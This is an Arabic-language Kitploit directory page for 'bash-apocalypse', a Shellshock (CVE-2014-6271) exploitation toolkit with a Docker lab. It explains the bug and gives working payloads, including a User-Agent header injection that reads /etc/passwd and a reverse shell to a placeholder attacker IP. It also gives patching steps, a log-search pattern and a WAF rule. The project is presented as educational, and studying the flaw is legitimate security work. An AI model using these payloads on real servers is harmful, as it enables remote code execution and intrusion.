Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
bash-apocalypse — إعادة إنشاء Shellshock (CVE-2014-6271) - ثغرة bash التي عرّضت ملايين الخوادم للخطر. مجموعة أدوات استغلال آلية + منهجية Burp Suite + مختبر Docker. أُنشئ للبحث الأمني والتعليم. مشروع ضمن محفظة مشاريع الأمن الهجومي. | Kitploit
أدوات/GitHubGitHub/mtaha-sec/bash-apocalypse
ماسحات الثغرات الأمنيةتوليد الحمولةالاستغلالالتهرب من IDS/IPSشيل كوداستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرةسوء التكوينالتعلم والتعليممختبرات وتدريب عملي
3منذ شهر واحدلم تتم المراجعة بعد
GitHub
mtaha-sec/bash-apocalypse

bash-apocalypse

إعادة إنشاء Shellshock (CVE-2014-6271) - ثغرة bash التي عرّضت ملايين الخوادم للخطر. مجموعة أدوات استغلال آلية + منهجية Burp Suite + مختبر Docker. أُنشئ للبحث الأمني والتعليم. مشروع ضمن محفظة مشاريع الأمن الهجومي.

عرض المستودع

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

Bash Apocalypse

مجموعة أدوات استغلال آلية لثغرة CVE-2014-6271 (شيلشوك)

Severity CVSS Score

مشروع بحث أمني متكامل يوضح ثغرة شيلشوك (Shellshock) التي أثرت على ملايين الخوادم في عام 2014. يتضمن فحصًا آليًا، وقدرات استغلال، وتوصيات دفاعية.

Demo


ما هي شيلشوك؟

شيلشوك (CVE-2014-6271) هي ثغرة حرجة في قشرة Bash تسمح بتنفيذ الأوامر عن بُعد عبر التلاعب بمتغيرات البيئة. اكتُشفت في عام 2014 بعد أن ظلت موجودة لمدة 22 عامًا، وأثرت على ملايين أنظمة Unix/Linux حول العالم.

كيف تعمل:

root@kitploit:~
# Normal: Bash exports functions as environment variables
my_function='() { echo "hello"; }'

# The bug: Bash continues parsing after the function definition
exploit='() { :;}; echo "PWNED"'  # The second command executes

خوادم الويب التي تستخدم CGI تمرر ترويسات HTTP إلى Bash كمتغيرات بيئة، مما يجعلها عرضة للثغرة:

root@kitploit:~
User-Agent: () { :;}; echo; /bin/bash -c 'cat /etc/passwd'

بدء سريع

root@kitploit:~
# Clone and setup
git clone https://github.com/YOUR-USERNAME/bash-apocalypse.git
cd bash-apocalypse

# Start vulnerable lab
docker-compose up -d

# Run exploit
chmod +x exploit.sh
./exploit.sh --url http://localhost:8080/cgi-bin/test.cgi --cmd "whoami"

الميزات

الماسح الآلي

  • يكتشف نقاط نهاية CGI الضعيفة
  • يختبر نقاط حقن متعددة (User-Agent وReferer وCookie)
  • دعم قوائم كلمات مخصصة

أداة الاستغلال

  • تنفيذ الأوامر مع التقاط المخرجات
  • قشرة عكسية آلية
  • خيارات حمولات متعددة

بيئة المختبر

  • إعداد Docker بأمر واحد
  • خادم ضعيف معزول
  • بيئة اختبار آمنة

الاستخدام

فحص الثغرات

root@kitploit:~
./exploit.sh --scan --target localhost --port 8080

تنفيذ الأوامر

root@kitploit:~
./exploit.sh --url http://target/cgi-bin/test.cgi --cmd "id"

الحصول على قشرة عكسية

root@kitploit:~
# Terminal 1
nc -lvnp 4444

# Terminal 2
./exploit.sh --url http://target/cgi-bin/test.cgi --reverse-shell YOUR_IP:4444

الاستغلال اليدوي (Burp Suite)

الخطوة 1: اعتراض الطلب

Burp Intercept

الخطوة 2: حقن الحمولة

Exploitation

عدّل ترويسة User-Agent:

root@kitploit:~
User-Agent: () { :;}; echo; /bin/bash -c 'cat /etc/passwd'

الخطوة 3: ملاحظة الاستجابة

Reverse Shell

ينفّذ الخادم أمرك ويعيد لك المخرجات.


التحليل الفني

تدفق الهجوم

root@kitploit:~
Client (Attacker)
    │
    │ HTTP Request with malicious User-Agent
    ▼
Web Server
    │
    │ Passes header as environment variable
    ▼
CGI Script
    │
    │ Spawns Bash process
    ▼
Bash Shell
    │
    │ Parses function + executes trailing commands
    ▼
Command Execution (RCE)

السبب الجذري

عندما تصادف Bash تعريف دالة في متغير بيئة:

  1. تحلل الدالة: () { :;}
  2. الخطأ: تستمر في التحليل وتنفذ أي أمر بعدها
  3. النتيجة: تنفيذ أوامر تعسفي

الدفاع

التخفيف الفوري

root@kitploit:~
# Update Bash
sudo apt-get update && sudo apt-get upgrade bash

# Disable CGI if not needed
sudo a2dismod cgi && sudo systemctl restart apache2

الاكتشاف

root@kitploit:~
# Check logs for exploitation attempts
grep -E "\\(\\)|\\{.*\\}" /var/log/apache2/access.log

قاعدة WAF

root@kitploit:~
SecRule REQUEST_HEADERS "\\(\\).*\\{" "deny,status:403,msg:'Shellshock Attack'"

المهارات المعروضة

  • اختبار اختراق تطبيقات الويب
  • كتابة سكربتات Bash والأتمتة
  • التلاعب ببروتوكول HTTP
  • الحاويات باستخدام Docker
  • إتقان Burp Suite
  • الأمن الهجومي والدفاعي معًا

هيكل المشروع

root@kitploit:~
bash-apocalypse/
├── README.md
├── exploit.sh              # Main tool
├── payloads.txt            # Test payloads
├── docker-compose.yml      # Lab setup
└── screenshots/
    ├── intercept.png
    ├── Payload.png
    └── result.png

إخلاء مسؤولية قانوني

لأغراض تعليمية فقط. لا تختبر سوى الأنظمة التي تملكها أو التي لديك إذن صريح لاختبارها. الوصول غير المصرح به غير قانوني.


الموارد

  • تفاصيل CVE-2014-6271
  • Cloudflare: داخل شيلشوك
  • تدريب: HackTheBox - Shocker

صُمم لفهم كيفية عمل الثغرات وكيفية الدفاع ضدها. ;)

تنزيل الأداة